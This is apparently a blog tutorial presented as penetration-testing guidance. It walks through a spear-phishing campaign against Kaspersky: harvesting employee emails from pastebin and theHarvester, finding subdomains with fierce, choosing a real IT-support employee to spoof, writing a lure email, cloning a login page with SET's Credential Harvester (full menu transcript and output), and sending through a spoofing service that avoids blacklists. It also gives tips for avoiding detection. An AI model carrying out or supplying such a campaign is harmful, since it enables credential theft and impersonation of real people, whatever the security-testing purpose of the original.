This primer covers sending spoofed emails from an online service with a link to a clone credential harvesting site. SET provides a clean, menu-driven interface for website cloning and automates the process. Using sendmail directly is also an option in SET; it requires a single change to the configuration and a mail relay to function correctly.
We will again use the Hackerone directory to identify a company but WILL NOT be sending phishing emails to them. This would be really bad form and potentially illegal. For this, we are going to pick on a known antivirus and security company, Kaspersky. Kaspersky was basically chosen because it is a large enough organization that we should be able to find a decent page to clone, and there should be enough email addresses in the wild to generate a list from a few different places.
Email Target List
The heart of any successful phishing campaign is the list of targets. Normally we would use recon-ng to build this list, but in this tutorial, we will do a few manual processes to show other methods. These can absolutely be automated, but for now lets do it the hard way.
From pastebin.com, I searched for “@kaspersky.com -license”. This is because the top pastes were all license key dumps, and I was specifically looking for emails.
I threw the entire raw contents of the data in a text file, lets look in a few other places. We have already used theHarvester to find email addresses in the recon-ng tutorial, so let’s also use and put the results in the same text file.
root@kali:~/Desktop# theharvester -d kaspersky.com -b all
We need to quickly pull out and de-duplicate the email addresses. This isn’t an issue with theHarvester but the pastebin data isn’t structured.
root@kali:~/Desktop# grep @kaspersky.com kasperskyRawEmails.txt > kasperskyEmail.txt root@kali:~/Desktop# leafpad kasperskyEmail.txt root@kali:~/Desktop# sort -d kasperskyEmail.txt > kasperskyEmailSorted.txt root@kali:~/Desktop# sort -u kasperskyEmailSorted.txt > kasperskyEmail.txt
I used leafpad to clean up a few lines that had extra data. If there were more than a handful, I would have written a sed or awk script to clean it up, but with just a few, it was just as quick to do it manually. I sorted it with the -d option to put them in alphabetical order then -u to get rid of any duplicates. More importantly, by looking at the email addresses, we can easily guess anyone’s email in the company because they follow the email@example.com. A quick LinkedIn search of people who work at Kaspersky would provide us with another list. Personally, I would remove Eugene Kaspersky from the list since he is the founder, but hey, do what you want. In a normal penetration test, most companies would ask to approve the list and remove or add people as they see fit. For reporting reasons, running a wc -l against this list once approved will give you the number of emails. From these three searches, we have 142 unique targets.
While in the list, it is always good to look through and remove any email that is generic or does not direct to an actual person. Examples would be firstname.lastname@example.org or email@example.com. Also and more importantly, remove anything that will get you caught. I hate to say this, but do not attempt to phish spam@ or abuse@ addresses; if it does work, you probably get extra h4x0r cred, though.
Baiting the Hook
To figure out who to spoof, I went on LinkedIn and searched for IT Support in the United States for Kaspersky. I’ve redacted the person’s name, but it is plausible that this person would send out an email about a website, and since the email will be in English, that shouldn’t be a huge red flag. Sending out an email from an employee in the Russian Federation written in English should raise questions. Writing it in English and attempting to emulate a translation from Russian may work, as well.
Next, we need to identify a website to clone. We need a login on this page to spoof, so first we will use fierce to identify potential sub-domains.
root@kali:~/Desktop# fierce -dns kaspersky.com
I looked through the fierce results and settled on https://g.kaspersky.com for the page to be cloned. I like the simple page layout, so there are less chances for the clone to go wrong and log into a support page based on the title. VPN and Outlook Web Access (OWA) are normally my favorite pages, but occasionally, the clone needs to be massaged to make it look normal.
Next, let’s work on the Subject and Body of the email message.
Subject: Support Bot Login Page Test
All, We are testing the new login page for support bot at g.kaspersky.com. The old page had some certificate errors that prevented some users from reaching it so please let us know if this is still happening and also test that your password still works before the new systems goes live (http://192.168.2.131/login). Let me know if you have any problems.
Spoofed IT Guy
Reading the email, we need to address a few things. First, is the certificate error that we get going to the real site? This is one of the many reasons why it is important to NOT train your users to click through certificate errors. Also, mixing a little bit of truth in with the lie helps to make it more effective.
Second, ask them to log into the page and contact us if there are any errors. Because we will be using a spoofed email and not a fake email address, this adds a little bit of risk that someone will respond and either confuse the IT staff or alert them to the phishing campaign that is underway. Spend some time thinking and crafting the email message to work for the company you’re testing.
We will use SET to clone the website and harvest credentials. The ***** indicates that I’ve redacted the screen text and have only shown the option to choose.
root@kali:/opt/social-engineer-toolkit# setoolkit ***** Select from the menu: 1) Social-Engineering Attacks 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1 ***** Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) SMS Spoofing Attack Vector 11) Third Party Modules 99) Return back to the main menu. ***** set> 2 1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Web Jacking Attack Method 6) Multi-Attack Web Method 7) Full Screen Attack Method 8) HTA Attack Method 99) Return to Main Menu set:webattack>3 ***** 1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack>2 [-] Credential harvester will allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from a website as well as place them into a report [-] This option is used for what IP the server will POST to. [-] If you're using an external IP, use your external IP for this set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.2.131
The address is either for the local host (in this case) or for the server that will be hosting the web servers external interface. (NOTE: We are currently watching this thread https://github.com/trustedsec/social-engineer-toolkit/issues/289, if a fix gets posted for the OpenSSL/PEM file issue we will update this)
[-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:https://g.kaspersky.com/login [*] Cloning the website: https://g.kaspersky.com/login [*] This could take a little bit... Python OpenSSL wasn't detected or PEM file not found, note that SSL compatibility will be affected.
If you wanted to add SSL support to improve the quality of the attack, SET absolutely supports it with a few changes. And https://letsencrypt.org will allow you to get free SSL certificates. I’ve highlighted the differences in the preceding images.
[*] Printing error: zipimporter() argument 1 must be string, not function The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] The Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below: 192.168.2.1 - - [27/Apr/2017 16:11:47] "GET / HTTP/1.1" 200 -
Now, we send out bait and see who we can catch.
Set the Hook
We have used a couple different email spoofing services and have recently settled on Sharpmail.co.uk. They work well, and they don’t get blacklisted in mail servers. It is a paid server; though, if you want premium features such as removing the tag line at the bottom or sending SMS messages. Below is a screen showing how to send messages in Sharpmail; there is an argument to be made that putting a few of the addresses together in the To: line would make it more believable, but for now, they are all in the BCC: line.
Finally, we would send this email out and simply wait to see who got hooked.
SET has a nice live update when credentials are captured and also packages up a report at the end.
From here it would depend on what the client requests. Do you use these credentials to attempt further exploitation or just produce the report? Your testing might be done, or you could have potentially generated a bunch of additional work for yourself.